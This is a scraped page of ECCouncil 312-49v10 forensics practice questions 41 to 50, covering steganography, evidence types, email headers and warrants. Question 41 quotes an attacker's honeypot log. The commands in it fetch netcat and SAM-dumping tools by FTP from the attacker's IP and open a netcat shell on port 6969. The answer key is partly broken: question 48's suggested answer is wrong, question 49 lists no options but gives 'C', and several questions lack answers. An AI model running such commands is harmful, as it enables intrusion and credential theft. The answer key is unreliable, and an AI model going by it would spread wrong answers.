Home / ECCouncil / 312-49v10 / List of questions

Ask Question

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 5

List of questions

Question 41

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

It is a local exploit where the attacker logs in using username johna2k

There are two attackers on the system - johna2k and haxedj00

The attack is a remote exploit and the hacker downloads three files

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Show Answer Comment (0)

Suggested answer: C

Explanation:

The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

Explanation:

asked 18/09/2024

Sam Poon

46 questions

Question 42

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

rootkit

key escrow

steganography

Offset

Show Answer Comment (0)

Suggested answer: C

asked 18/09/2024

Arnaud DUTEL

36 questions

Question 43

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:

Inculpatory evidence

Mandatory evidence

Exculpatory evidence

Terrible evidence

Show Answer Comment (0)

Suggested answer: C

asked 18/09/2024

EduBP srl De Sanctis

39 questions

Question 44

If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?

true

false

Show Answer Comment (0)

Question 45

What binary coding is used most often for e-mail purposes?

MIME

Uuencode

IMAP

SMTP

Show Answer Comment (0)

Question 46

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

The system files have been copied by a remote attacker

The system administrator has created an incremental backup

The system has been compromised using a t0rnrootkit

Nothing in particular as these can be operational files

Show Answer Comment (0)

Question 47

From the following spam mail header, identify the host IP that sent this spam?

From [email protected] [email protected] Tue Nov 27 17:27:11 2001

Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk

(8.11.6/8.11.6) with ESMTP id

fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)

Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1)

with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)

Message-Id: >[email protected]

From: "china hotel web"

To: "Shlam"

Subject: SHANGHAI (HILTON HOTEL) PACKAGE

Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0

X-Priority: 3 X-MSMail-

Priority: Normal

Reply-To: "china hotel web"

137.189.96.52

8.12.1.0

203.218.39.20

203.218.39.50

Show Answer Comment (0)

Suggested answer: C

asked 18/09/2024

Madhankumar Rathinakumar

42 questions

Question 48

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

deltree command

CMOS

Boot.sys

Scandisk utility

Show Answer Comment (0)

Suggested answer: C

asked 18/09/2024

Pang Guo Ming

35 questions

Question 49

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

Show Answer Comment (0)

Suggested answer: C

asked 18/09/2024

Jason Evans

52 questions

Question 50

When obtaining a warrant, it is important to:

particularlydescribe the place to be searched and particularly describe the items to be seized

generallydescribe the place to be searched and particularly describe the items to be seized

generallydescribe the place to be searched and generally describe the items to be seized

particularlydescribe the place to be searched and generally describe the items to be seized

Show Answer Comment (0)

Question

Case Study

Question 41 (0)

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICO

Question 42 (0)

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

Question 43 (0)

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fac

Question 44 (0)

If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?

Question 45 (0)

What binary coding is used most often for e-mail purposes?

Question 46 (0)

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

Question 47 (0)

From the following spam mail header, identify the host IP that sent this spam? From [email protected] [email protected] Tue Nov 27 17:27:11 2001 Received: from viruswall.ie.cuhk.edu.hk (viru

Question 48 (0)

If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

Question 49 (0)

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer

Question 50 (0)

When obtaining a warrant, it is important to:

Export

with questions and answers will be exported as:

VPLUS file

PDF file (Demo 30 questions)

Highest scored 'comment-votes'

Your question list is being generated. We'll email you once it’s ready.

If you didn't receive an email within 5 minutes, you should submit a support request to [email protected].